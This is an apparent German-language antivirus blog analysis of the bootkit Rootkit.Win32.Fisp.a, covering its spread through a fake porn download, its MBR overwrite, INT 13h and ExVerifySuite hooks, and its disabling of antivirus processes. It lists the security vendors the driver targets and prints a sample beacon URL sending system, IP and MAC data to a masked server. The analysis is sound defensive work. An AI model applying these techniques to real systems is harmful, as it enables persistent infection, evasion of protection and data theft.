Chinesisches Bootkit

Vor Kurzem entdeckten wir ein neues Bootkit — einen Schädling also, der den Bootsektor der Festplatte infiziert – mit der Bezeichnung Rookit.Win32.Fisp.a.

Zu seiner Verbreitung verwendet das Bootkit den Trojan-Downloader.NSIS.Agent.jd. Dieser Schädling gelangt auf die Computer von Anwendern, die allzu unbedacht versuchen, ein Video von einer gefälschten chinesischen Porno-Website herunterzuladen.

Der Downloader zeichnet sich dadurch aus, dass er andere Schädlinge mit Hilfe einer NSIS-Engine lädt, und alle Links in dem entsprechenden NSIS-Skript speichert.

Fragment des NSIS-Skripts des Schädlings Trojan-Downloader.NSIS.Agent.jd

Unter den vom Downloader herunterzuladenden Dateien ist auch der Dropper Rootkit.Win32.Fisp.a. Dieser Schädling infiziert den Bootsektor der Festplatte. Dabei speichert er den alten MBR im dritten Sektor und schreibt seinen an dessen Stelle. Mit dem vierten Sektor beginnend platziert er den verschlüsselten Treiber und den restlichen Code.

Fragment des Beginns einer mit Rootkit.Win32.Fisp.a infizierten Festplatte

Nach der Infizierung des Computers übernimmt der Schädling gleich beim Start des Rechners die Kontrolle. Um den Boot-Prozess von Windows steuern zu können, tauscht er als erstes die den Interrupt INT 13h durch eine Veränderung der Interruptvektortabelle aus. Daraufhin stellt das Bootkit den Original-MBR wieder her und nimmt den normalen Bootprozess wieder auf.

Ist ein bestimmter Teil des Systems geladen, fängt das Bootkit die Funktion ExVerifySuite ab. Der installierte Hook tauscht den Systemtreiber fips.sys gegen einen schädlichen Treiber aus, der in verschlüsselter Form an den Anfang der Festplatte geschrieben wurde. Bemerkenswert ist, dass der Treiber fips.sys für das korrekte Funktionieren des Betriebssystems nicht unbedingt erforderlich ist, daher bricht das System nach seinem Austausch nicht zusammen.

Der schädliche Treiber fängt die zu startenden Prozesse mit Hilfe der PsSetLoadImageNotifyRoutine ab. Der Hook bearbeitet im geladenen Abbild den PE-Header, indem er in ihm die Sektion Security des Feldes DataDirectory durchsieht. Der Driver enthält eine Liste von Zeilen, die sich in den Prozessen gängiger Antiviren-Programme finden. Wird in den Prozessen eine dieser Zeilen identifiziert, so modifiziert der Treiber dem zu ladenden Abbild den Eintrittspunkt, so dass ein normales Funktionieren des Abbilds unmöglich wird.


Beike
Beijing Rising Information Technology
AVG Technologies
Trend Micro
BITDEFENDER LLC
Symantec Corporation
Kaspersky Lab
ESET, spol
Beijing Jiangmin
Kingsoft Software
360.cn
Keniu Network Technology (Beijing) Co
Qizhi Software (beijing) Co,

Die Hauptfunktionalität des Treibers besteht jedoch im Eindringen in den Prozess explorer.exe und dem Download einer anderen Version von Rootkit.Win32.Fisp.a mit der Funktionalität eines Downloaders. Das Schadprogramm schickt eine Anfrage mit Informationen über das installierte Betriebssystem, die IP-Adresse, die MAC-Adresse usw. an den Server.

http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=192.168.0.16&c=00-00-00-00-00-00&f=none&g=none&k=a&h=62&i=2&j=0321-01

Beispiel einer an den Server gesendeten Anfrage

Als Resultat lädt der Schädling auf den Computer des Anwenders Modifikationen von Trojan-Dropper.Win32.Vedio.dgs und Trojan-GameThief.Win32.OnLineGames.boas.

Das oben Beschriebene lässt sich in Form eines Schemas grafisch darstellen:

Die Produkte von Kaspersky Lab erkennen die Bedrohung Rootkit.Win32.Fisp.a und machen sie unschädlich.

Ähnliche Beiträge

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.